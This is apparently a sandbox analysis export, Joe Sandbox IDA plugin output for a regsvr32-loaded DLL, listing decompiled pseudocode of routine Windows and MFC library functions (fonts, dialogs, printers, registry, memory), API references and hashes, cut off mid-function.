0x1000cb3f
0x1000cb43
0x1000cb46
0x1000cb4c
0x1000cb4c
0x1000cb4c
0x1000cb43
0x1000cb4e
0x1000cb51
0x1000cb56
0x1000cb5f
0x1000cb5f
0x1000cb67
0x1000cb69
0x1000cb69
0x1000cb69
0x00000000
0x1000cb69
0x1000ca6e
0x1000ca72
0x1000ca7d
0x1000ca81
0x1000ca91
0x1000ca94
0x1000ca98
0x1000ca9d
0x1000caa0
0x1000caab
0x1000caab
0x00000000
0x1000caa0
0x1000ca36
0x1000ca38
0x00000000
0x00000000
0x1000ca42
0x1000ca44
0x00000000
0x00000000
0x1000ca4e
0x1000ca55
0x1000ca5a
0x1000ca5c
0x1000ca5e
0x00000000
0x00000000
0x1000ca60
0x1000ca65
0x1000ca67
0x1000ca67
0x00000000
0x1000ca65
0x1000c9d2
0x1000c9dd
0x1000c9f4
0x00000000
0x1000c9f4
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 1000C98B
GetSystemMetrics.USER32 ref: 1000CA3C
GlobalLock.KERNEL32 ref: 1000CAA5
CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4

Strings

MS Shell Dlg, xrefs: 1000CA46

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100149BE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100149BE(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x100149c4
0x100149cb
0x100149d0
0x100149d9
0x100149dc
0x100149df
0x100149e4
0x100149e8
0x100149f2
0x10014a01
0x10014a05
0x10014a12
0x10014a14
0x10014a16
0x10014a16
0x10014a31
0x10014a34
0x10014a34
0x10014a3a
0x10014a3a
0x10014a40
0x10014a42
0x10014a42
0x10014a5d
0x10014a5d
0x100149ec
0x100149f0
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 100149E4
GetStockObject.GDI32(0000000D), ref: 100149EC
GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
GetDC.USER32(00000000), ref: 10014A08
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
ReleaseDC.USER32 ref: 10014A34

Strings

System, xrefs: 100149DF, 10014A49

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10009360, Relevance: 13.6, APIs: 9, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10009360(intOrPtr __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t38;
				long _t49;
				intOrPtr _t50;
				void* _t60;
				long _t76;
				void* _t84;
				void* _t85;

				_v32 = __ecx;
				if(_a4 == 8) {
					return E100090F0(_t60, _v32, _t84, _t85);
				}
				if(_a4 == 9) {
					_t38 =  *0x10058ece & 0x000000ff;
					if(_t38 != 0) {
						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
						_v12 = _v32 + 0x74;
						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
						if(0 == 0) {
							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
						}
						_t76 =  *0x10058f0c; // 0x1005aa2c
						_v16 = _t76;
						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
						if(_v8 > 0x1000) {
							_t50 =  *0x10058f0c; // 0x1005aa2c
							_t21 = _t50 - 0xc; // 0x0
							_v20 =  *_t21;
							_v24 = _v32 + 0x74;
							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
							if(0 == 0) {
								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
							}
							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
						}
						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
						 *0x10058ece = 0;
						return _t49;
					}
				}
				return _t38;
			}

0x10009366
0x1000936d
0x00000000
0x10009372
0x10009380
0x10009386
0x1000938f
0x100093ab
0x100093b4
0x100093cb
0x100093d3
0x100093e5
0x100093e5
0x100093eb
0x100093f1
0x10009409
0x10009416
0x10009418
0x1000941d
0x10009420
0x10009429
0x1000943e
0x10009446
0x10009458
0x10009458
0x10009474
0x10009474
0x10009493
0x100094ab
0x100094b1
0x00000000
0x100094b1
0x1000938f
0x100094bb

APIs

SendMessageA.USER32 ref: 100093A5
SendMessageA.USER32 ref: 100093CB
SendMessageA.USER32 ref: 100093E5
SendMessageA.USER32 ref: 10009409
SendMessageA.USER32 ref: 1000943E
SendMessageA.USER32 ref: 10009458
SendMessageA.USER32 ref: 10009474
SendMessageA.USER32 ref: 1000948D
SendMessageA.USER32 ref: 100094AB

Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091CA
Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091E4

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013C4D, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10017BF4(E10028893, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10013965(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1002b1d8;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10013A82( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10017C60(_t36);
			}

0x10013c4d
0x10013c54
0x10013c59
0x10013c5b
0x10013c5e
0x10013c62
0x10013c65
0x10013c6b
0x10013c72
0x10013d73
0x10013c81
0x10013c89
0x10013c8d
0x10013cc1
0x10013cc4
0x10013cc9
0x10013ccb
0x10013cd7
0x10013cd7
0x10013ccd
0x10013ccd
0x10013cd3
0x10013cd3
0x10013cd9
0x10013cde
0x10013ce1
0x10013ce4
0x10013ce7
0x00000000
0x10013c8f
0x10013c8f
0x10013c95
0x10013ca4
0x10013ca4
0x10013ca7
0x10013d0b
0x10013d11
0x10013d16
0x10013ca9
0x10013cae
0x10013cb4
0x10013cb7
0x10013cb7
0x10013d1c
0x10013d1e
0x10013d23
0x10013d29
0x10013d29
0x10013d31
0x10013d42
0x10013d4e
0x10013d53
0x10013d59
0x10013d59
0x10013c95
0x10013d5c
0x10013d61
0x10013d6b
0x10013d6b
0x10013d6e
0x10013d6e
0x10013d74
0x10013d7f

APIs

__EH_prolog3_catch.LIBCMT ref: 10013C54
EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6E3, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000A6E3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10014056(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10014056( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

0x1000a6e6
0x1000a6e8
0x1000a6ea
0x1000a6f2
0x1000a70c
0x1000a714
0x1000a71e
0x1000a725
0x1000a727
0x1000a72c
0x1000a72f
0x1000a72f
0x1000a746
0x1000a74d
0x1000a765
0x1000a76a
0x1000a76f
0x1000a76f
0x1000a775
0x1000a775
0x1000a725
0x1000a77a
0x1000a77e

APIs

GlobalLock.KERNEL32 ref: 1000A700
lstrcmpA.KERNEL32(?,?), ref: 1000A70C
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
GlobalLock.KERNEL32 ref: 1000A750
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775

Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10013854, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013854(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1005aa30 = GetSystemMetrics(2) + 1;
				 *0x1005aa34 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x1001385f
0x10013865
0x1001386c
0x10013874
0x1001387e
0x1001388f
0x10013899
0x100138a1
0x100138ad

APIs

GetSystemMetrics.USER32 ref: 10013861
GetSystemMetrics.USER32 ref: 10013868
GetSystemMetrics.USER32 ref: 1001386F
GetSystemMetrics.USER32 ref: 10013879
GetDC.USER32(00000000), ref: 10013883
GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
ReleaseDC.USER32 ref: 100138A4

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD98, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10057a08; // 0x7d1a16f8
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E10017BC1(E10027F63, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000BB54(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000BB65();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
						_push(0x1002a248);
						_push( &_v16);
						_push( &_v36);
						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E1000BC25(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10009CB7(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E1000BC89(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E1000BC89(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10057298;
						E10017C83( &_v280, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t79, 0, _t100);
						_t94 = E10013965(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000CF71(_t94);
						}
						return E10017C60(_t77);
					}
				}
			}

0x1000bd98
0x1000bd98
0x1000bd98
0x1000bd9f
0x1000bda3
0x1000bdaa
0x1000bdb0
0x1000bdb7
0x1000bdbe
0x1000bdc0
0x1000bdc3
0x1000bdc6
0x1000bdcd
0x1000bdd0
0x1000bdd2
0x1000bdd2
0x1000bdd5
0x1000bdd6
0x1000bdd8
0x1000bddd
0x1000bddf
0x1000bde1
0x1000bde8
0x1000bdea
0x1000bdea
0x1000bded
0x1000bded
0x1000bdd2
0x1000bdf2
0x1000bdf5
0x1000bed2
0x1000bed8
0x1000bee0
0x1000bee1
0x1000bee2
0x1000beeb
0x1000bef0
0x1000bef7
0x1000bdfb
0x1000bdfd
0x1000be03
0x1000be05
0x1000be0c
0x1000be14
0x1000be1f
0x1000be22
0x1000be27
0x1000be2f
0x1000be33
0x1000be34
0x1000be39
0x1000be3c
0x1000be40
0x1000be44
0x1000be45
0x1000be53
0x1000be57
0x1000be5f
0x1000be65
0x1000be66
0x1000be73
0x1000be79
0x1000be7b
0x1000be90
0x1000be95
0x1000be9a
0x1000be9b
0x1000be9c
0x1000be9c
0x1000bea4
0x1000bea4
0x1000beb6
0x1000bec2
0x1000beca
0x1000becd
0x00000000
0x1000be07
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x1000be05

APIs

__EH_prolog3.LIBCMT ref: 1000BDB7
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6

Strings

Software\, xrefs: 1000BE0C

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6F2, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E1000B519(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
